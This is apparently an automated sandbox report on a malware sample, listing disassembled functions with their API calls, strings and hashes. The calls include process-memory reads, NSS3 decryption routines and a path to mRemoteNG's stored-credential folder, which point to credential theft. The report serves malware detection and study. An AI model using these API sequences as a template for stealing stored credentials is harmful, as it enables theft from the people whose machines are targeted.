Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: memset$Value$CriticalEnterErrorSectionUnlock
String ID:
API String ID: 2972906980-0
Opcode ID: 45b8110553f2e8153564c73ce191cc3c56a27534342e03abf1cfa86af50501ba
Instruction ID: 4b773c3384527de54969e5182d7792369e18f27ee3cb1aa1ccb755cbeb7c58db
Opcode Fuzzy Hash: 45b8110553f2e8153564c73ce191cc3c56a27534342e03abf1cfa86af50501ba
Instruction Fuzzy Hash: D74163B0E003019BEB10EF31CD98BA97774BB88308F150628ED00D7A5AF772A9C4CA91

Uniqueness

Uniqueness Score: -1.00%

Function 00413BC0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 156stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00413BDF
??_U@YAPAXI@Z.MSVCRT ref: 00413C0D

Part of subcall function 00413890: strlen.MSVCRT ref: 004138A1
Part of subcall function 00413890: strlen.MSVCRT ref: 004138C5

VirtualQueryEx.KERNEL32(00413FCD,00000000,?,0000001C), ref: 00413C52
??_V@YAXPAX@Z.MSVCRT ref: 00413D73

Part of subcall function 00413AA0: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00413AB8

Strings

Z>A, xrefs: 00413C38, 00413C3B
@, xrefs: 00413C66

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: strlen$MemoryProcessQueryReadVirtual
String ID: @$Z>A
API String ID: 2950663791-2427737632
Opcode ID: c34cf874e28939f0e2f9d61df82db9ff8d9d9859511bff8662e41e87a2571aa0
Instruction ID: 18b3d1c53e1ab9283c7d4f20bb5e0d2682d9205760932c7229ac25ba092b9e39
Opcode Fuzzy Hash: c34cf874e28939f0e2f9d61df82db9ff8d9d9859511bff8662e41e87a2571aa0
Instruction Fuzzy Hash: 2851F9B5D00109ABDB04CF98E981AEFB7B5FF88305F108119F919A7340D738AA51CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 6C35AC10 Relevance: 10.6, APIs: 7, Instructions: 121memoryCOMMON

Download Yara Rule

APIs

PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6C35AB3E,?,?,?), ref: 6C35AC35

Part of subcall function 6C33CEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6C33CF16

PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C35AB3E,?,?,?), ref: 6C35AC55

Part of subcall function 6C3710C0: TlsGetValue.KERNEL32(?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C3710F3
Part of subcall function 6C3710C0: EnterCriticalSection.KERNEL32(?,?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C37110C
Part of subcall function 6C3710C0: PL_ArenaAllocate.NSS3(?,?,?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C371141
Part of subcall function 6C3710C0: PR_Unlock.NSS3(?,?,?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C371182
Part of subcall function 6C3710C0: TlsGetValue.KERNEL32(?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C37119C

PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6C35AB3E,?,?), ref: 6C35AC70

Part of subcall function 6C33E300: TlsGetValue.KERNEL32 ref: 6C33E33C
Part of subcall function 6C33E300: EnterCriticalSection.KERNEL32(?), ref: 6C33E350
Part of subcall function 6C33E300: PR_Unlock.NSS3(?), ref: 6C33E5BC
Part of subcall function 6C33E300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6C33E5CA
Part of subcall function 6C33E300: TlsGetValue.KERNEL32 ref: 6C33E5F2
Part of subcall function 6C33E300: EnterCriticalSection.KERNEL32(?), ref: 6C33E606
Part of subcall function 6C33E300: PORT_Alloc_Util.NSS3(?), ref: 6C33E613

PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C35AC92
PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6C35AB3E), ref: 6C35ACD7
PORT_Alloc_Util.NSS3(?), ref: 6C35AD10
memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6C35AD2B

Part of subcall function 6C33F360: TlsGetValue.KERNEL32(00000000,?,6C35A904,?), ref: 6C33F38B
Part of subcall function 6C33F360: EnterCriticalSection.KERNEL32(?,?,?,6C35A904,?), ref: 6C33F3A0
Part of subcall function 6C33F360: PR_Unlock.NSS3(?,?,?,?,6C35A904,?), ref: 6C33F3D3

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
String ID:
API String ID: 2926855110-0
Opcode ID: feb1708da4588188c0cc0e6a1fd8f389367f62bea95594c872d98728f57964bb
Instruction ID: 0b88d5e027b05d26da36c8515b1e81033f34cfcb576c6dfe88d97e6a03e44503
Opcode Fuzzy Hash: feb1708da4588188c0cc0e6a1fd8f389367f62bea95594c872d98728f57964bb
Instruction Fuzzy Hash: EC3138B1E002155FEB00AE259C40DFF76A6AF84728B598128E8599B740EB31DD259BB1

Uniqueness

Uniqueness Score: -1.00%

Function 6C338C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6C338C7C

Part of subcall function 6C3D9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C420A27), ref: 6C3D9DC6
Part of subcall function 6C3D9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C420A27), ref: 6C3D9DD1
Part of subcall function 6C3D9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C3D9DED

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C338CB0
TlsGetValue.KERNEL32 ref: 6C338CD1
EnterCriticalSection.KERNEL32(?), ref: 6C338CE5
PR_Unlock.NSS3(?), ref: 6C338D2E
PR_SetError.NSS3(FFFFE00F,00000000), ref: 6C338D62
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C338D93

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
String ID:
API String ID: 3131193014-0
Opcode ID: 7143437aad2a0b5b23f32d11dea499cc35429a875828d0c6385bfbf001dd95d9
Instruction ID: ee1fae787e2873130a085f4a5b77798f4e4b59f6ea24b06ecaf6823f9338391c
Opcode Fuzzy Hash: 7143437aad2a0b5b23f32d11dea499cc35429a875828d0c6385bfbf001dd95d9
Instruction Fuzzy Hash: E3315771A01221ABEB01AF68DC44BAAB774BF54318F10113BEA1DA7B50D731A914CFD2

Uniqueness

Uniqueness Score: -1.00%

Function 6C364470 Relevance: 10.6, APIs: 7, Instructions: 82COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,6C327296,00000000), ref: 6C364487
EnterCriticalSection.KERNEL32(?,?,?,6C327296,00000000), ref: 6C3644A0
PR_Unlock.NSS3(?,?,?,?,6C327296,00000000), ref: 6C3644BB
SECMOD_DestroyModule.NSS3(?,?,?,?,6C327296,00000000), ref: 6C3644DA
DeleteCriticalSection.KERNEL32(?,?,?,?,6C327296,00000000), ref: 6C364530
free.MOZGLUE(?,?,?,?,?,6C327296,00000000), ref: 6C36453C
PORT_FreeArena_Util.NSS3 ref: 6C36454F

Part of subcall function 6C34CAA0: PR_GetEnvSecure.NSS3(NSS_DISABLE_UNLOAD,6C32B1EE,D958E836,?,6C3651C5), ref: 6C34CAFA
Part of subcall function 6C34CAA0: PR_UnloadLibrary.NSS3(?,6C3651C5), ref: 6C34CB09

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: CriticalSection$Arena_DeleteDestroyEnterFreeLibraryModuleSecureUnloadUnlockUtilValuefree
String ID:
API String ID: 3590924995-0
Opcode ID: 076a737bb7eef6eb5304447fb6e20d27ca1a508366be190c37b9714492d9db93
Instruction ID: 48a13082457516c1a124f1e760ce4c21c90f1b509f539a883dbb0bece4608ec7
Opcode Fuzzy Hash: 076a737bb7eef6eb5304447fb6e20d27ca1a508366be190c37b9714492d9db93
Instruction Fuzzy Hash: 7D3115B4A046118FDB10EF7AC094669BBF0BF05318F014629D99997E04E735E898CF92

Uniqueness

Uniqueness Score: -1.00%

Function 6C328C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C328C1B
EnterCriticalSection.KERNEL32 ref: 6C328C34
PL_ArenaAllocate.NSS3 ref: 6C328C65
PR_Unlock.NSS3 ref: 6C328C9C
PR_Unlock.NSS3 ref: 6C328CB6

Part of subcall function 6C3BDD70: TlsGetValue.KERNEL32 ref: 6C3BDD8C
Part of subcall function 6C3BDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C3BDDB4

Strings

KRAM, xrefs: 6C328C8F

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
String ID: KRAM
API String ID: 4127063985-3815160215
Opcode ID: c10170f75fdbec73a8966f629e174cabb117f10e4a80f609eabdb0a65cdefc19
Instruction ID: 6fd754eecaaf06538f01884dad57f82cf5a3d27b2fc2af7ef4e979545981f19a
Opcode Fuzzy Hash: c10170f75fdbec73a8966f629e174cabb117f10e4a80f609eabdb0a65cdefc19
Instruction Fuzzy Hash: EB212EB26056118FDB00AF79C484569FBF4FF45708F05896ED8888B751DB39D885CF92

Uniqueness

Uniqueness Score: -1.00%

Function 6C422C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6C422CA0
PR_ExitMonitor.NSS3 ref: 6C422CBE
calloc.MOZGLUE(00000001,00000014), ref: 6C422CD1
strdup.MOZGLUE(?), ref: 6C422CE1
PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6C422D27

Strings

Loaded library %s (static lib), xrefs: 6C422D22

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: Monitor$EnterExitPrintcallocstrdup
String ID: Loaded library %s (static lib)
API String ID: 3511436785-2186981405
Opcode ID: 41e4fc3650daff729724fc5dc43cd226cc63fab7d3d8dcf3b4542c46919e335b
Instruction ID: d98a77e993b7a81d08c8b5bac8d791032d377e262c6e08c695760465b5462db4
Opcode Fuzzy Hash: 41e4fc3650daff729724fc5dc43cd226cc63fab7d3d8dcf3b4542c46919e335b
Instruction Fuzzy Hash: 261122B17102509FEB21EF16D84AE6677B4AB45329F14803DD80AC7B01DB39E808CFB2

Uniqueness

Uniqueness Score: -1.00%

Function 6C37ED00 Relevance: 9.2, APIs: 6, Instructions: 228memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6C37ED6B
PORT_Alloc_Util.NSS3(00000000), ref: 6C37EDCE

Part of subcall function 6C370BE0: malloc.MOZGLUE(6C368D2D,?,00000000,?), ref: 6C370BF8
Part of subcall function 6C370BE0: TlsGetValue.KERNEL32(6C368D2D,?,00000000,?), ref: 6C370C15

free.MOZGLUE(00000000,?,?,?,?,6C37B04F), ref: 6C37EE46
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C37EECA
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C37EEEA
PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C37EEFB

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: Alloc_Util$Arena$Valuefreemalloc
String ID:
API String ID: 3768380896-0
Opcode ID: 4303ecc1f28683ea039354284d306b013eeeeff0e8e82ddeae08f28e9d6346db
Instruction ID: 6f54131218c49ace86083bac33157681367e8b10c6390fa662c7702eb28d3590
Opcode Fuzzy Hash: 4303ecc1f28683ea039354284d306b013eeeeff0e8e82ddeae08f28e9d6346db
Instruction Fuzzy Hash: AB815AB5A003059FEB24CF59D884BAAB7F5BF88308F144428E8659BB51D739E814CFB5

Uniqueness

Uniqueness Score: -1.00%

Function 6C37CCF0 Relevance: 9.2, APIs: 6, Instructions: 171memorythreadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C37C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C37DAE2,?), ref: 6C37C6C2

PR_Now.NSS3 ref: 6C37CD35

Part of subcall function 6C3D9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C420A27), ref: 6C3D9DC6
Part of subcall function 6C3D9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C420A27), ref: 6C3D9DD1
Part of subcall function 6C3D9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C3D9DED

Part of subcall function 6C366C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C311C6F,00000000,00000004,?,?), ref: 6C366C3F

PR_GetCurrentThread.NSS3 ref: 6C37CD54

Part of subcall function 6C3D9BF0: TlsGetValue.KERNEL32(?,?,?,6C420A75), ref: 6C3D9C07

Part of subcall function 6C367260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C311CCC,00000000,00000000,?,?), ref: 6C36729F

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C37CD9B
PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6C37CE0B
PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C37CE2C

Part of subcall function 6C3710C0: TlsGetValue.KERNEL32(?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C3710F3
Part of subcall function 6C3710C0: EnterCriticalSection.KERNEL32(?,?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C37110C
Part of subcall function 6C3710C0: PL_ArenaAllocate.NSS3(?,?,?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C371141
Part of subcall function 6C3710C0: PR_Unlock.NSS3(?,?,?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C371182
Part of subcall function 6C3710C0: TlsGetValue.KERNEL32(?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C37119C

PORT_ArenaMark_Util.NSS3(00000000), ref: 6C37CE40

Part of subcall function 6C3714C0: TlsGetValue.KERNEL32 ref: 6C3714E0
Part of subcall function 6C3714C0: EnterCriticalSection.KERNEL32 ref: 6C3714F5
Part of subcall function 6C3714C0: PR_Unlock.NSS3 ref: 6C37150D

Part of subcall function 6C37CEE0: PORT_ArenaMark_Util.NSS3(?,6C37CD93,?), ref: 6C37CEEE
Part of subcall function 6C37CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C37CD93,?), ref: 6C37CEFC
Part of subcall function 6C37CEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C37CD93,?), ref: 6C37CF0B
Part of subcall function 6C37CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C37CD93,?), ref: 6C37CF1D

Part of subcall function 6C37CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C37CD93,?), ref: 6C37CF47
Part of subcall function 6C37CEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C37CD93,?), ref: 6C37CF67
Part of subcall function 6C37CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6C37CD93,?,?,?,?,?,?,?,?,?,?,?,6C37CD93,?), ref: 6C37CF78

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
String ID:
API String ID: 3748922049-0
Opcode ID: 0c92ea94daf3be3304902363c0db196c6786db1805ee9484663e3ef9b6b85a8d
Instruction ID: 8ef675af254b233f6006f9b9f0ac6ca60c2541a1cb66667e09837e874411be4f
Opcode Fuzzy Hash: 0c92ea94daf3be3304902363c0db196c6786db1805ee9484663e3ef9b6b85a8d
Instruction Fuzzy Hash: D451A676A005009BE730DF69EC40BAA73F4AF48349F250524D95597B40EB3AED05CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00417BA0 Relevance: 9.1, APIs: 6, Instructions: 98COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 00417BAE

Part of subcall function 00417641: __mtinitlocknum.LIBCMT ref: 00417657
Part of subcall function 00417641: __amsg_exit.LIBCMT ref: 00417663
Part of subcall function 00417641: EnterCriticalSection.KERNEL32(00000000,00000000,?,00417A49,0000000D,?,?,004173CF,0041726D,?,?,00417158,00000000,00421AC0,0041719F), ref: 0041766B

DecodePointer.KERNEL32(004219C8,00000020,00417CF1,00000000,00000001,00000000,?,00417D13,000000FF,?,00417668,00000011,00000000,?,00417A49,0000000D), ref: 00417BEA
DecodePointer.KERNEL32(?,00417D13,000000FF,?,00417668,00000011,00000000,?,00417A49,0000000D,?,?,004173CF,0041726D), ref: 00417BFB

Part of subcall function 004179C2: EncodePointer.KERNEL32(00000000,004191B2,00423DC8,00000314,00000000,?,?,?,?,?,00417F08,00423DC8,Microsoft Visual C++ Runtime Library,00012010), ref: 004179C4

DecodePointer.KERNEL32(-00000004,?,00417D13,000000FF,?,00417668,00000011,00000000,?,00417A49,0000000D,?,?,004173CF,0041726D), ref: 00417C21
DecodePointer.KERNEL32(?,00417D13,000000FF,?,00417668,00000011,00000000,?,00417A49,0000000D,?,?,004173CF,0041726D), ref: 00417C34
DecodePointer.KERNEL32(?,00417D13,000000FF,?,00417668,00000011,00000000,?,00417A49,0000000D,?,?,004173CF,0041726D), ref: 00417C3E

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2005412495-0
Opcode ID: 6a1b6e47f482ee4f200ebd968e601a8bdb3106e7e8c25533cbe6d2efabcc28cd
Instruction ID: 2ecc3aad81c9b81e2b27e7e3d170e1f8428b359c85680f8586e03e13f1a28f2c
Opcode Fuzzy Hash: 6a1b6e47f482ee4f200ebd968e601a8bdb3106e7e8c25533cbe6d2efabcc28cd
Instruction Fuzzy Hash: 39314C70A58309DBDF509FA9D8846DDBBF1BB48314F10802BE001A6290EB7C49C5CFAD

Uniqueness

Uniqueness Score: -1.00%

Function 6C2FC4E0 Relevance: 9.1, APIs: 6, Instructions: 52COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C2FC4F0
free.MOZGLUE ref: 6C2FC51A
TlsSetValue.KERNEL32 ref: 6C2FC540
free.MOZGLUE ref: 6C2FC557
DeleteCriticalSection.KERNEL32 ref: 6C2FC56A
free.MOZGLUE ref: 6C2FC576

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: free$Value$CriticalDeleteSection
String ID:
API String ID: 195087141-0
Opcode ID: 0b894f3d495ef629ccc62677702e21fd3ed4a792eb87c415390f61f71be23550
Instruction ID: b5717c99e4f4166641e1fe17b67ef483365d6a03302540f9f67c99e513fe5e59
Opcode Fuzzy Hash: 0b894f3d495ef629ccc62677702e21fd3ed4a792eb87c415390f61f71be23550
Instruction Fuzzy Hash: E9113D70504B498BCB21FF79C04866AFBF4BF45745F05092DE8DA93604EB349045CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00415960 Relevance: 9.0, APIs: 4, Strings: 2, Instructions: 41stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(04086718,?,?,?,0040F76C,?,04086718,00000000), ref: 0041596C
lstrcpyn.KERNEL32(C:\Users\user\AppData\Roaming\mRemoteNG\,04086718,04086718,?,0040F76C,?,04086718), ref: 00415990
lstrlen.KERNEL32(?,?,0040F76C,?,04086718), ref: 004159A7
wsprintfA.USER32 ref: 004159C7

Strings

%s%s, xrefs: 004159B5
C:\Users\user\AppData\Roaming\mRemoteNG\, xrefs: 0041598B, 004159C0, 004159D0

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: %s%s$C:\Users\user\AppData\Roaming\mRemoteNG\
API String ID: 1206339513-4037762877
Opcode ID: 145a19e204c32b80f721800f8dc263c6d3553908343d9ba3445ddbc103129e49
Instruction ID: ad4ab28855ecf1822f83189248f4f970b5300654cb1d5d0a0ffaf2e78bbea45f
Opcode Fuzzy Hash: 145a19e204c32b80f721800f8dc263c6d3553908343d9ba3445ddbc103129e49
Instruction Fuzzy Hash: 69015A75510908FFCB14DFA8D948EAE7BB9FF88344F108588F90A9B340CA71AA40CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00410FA0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 251COMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
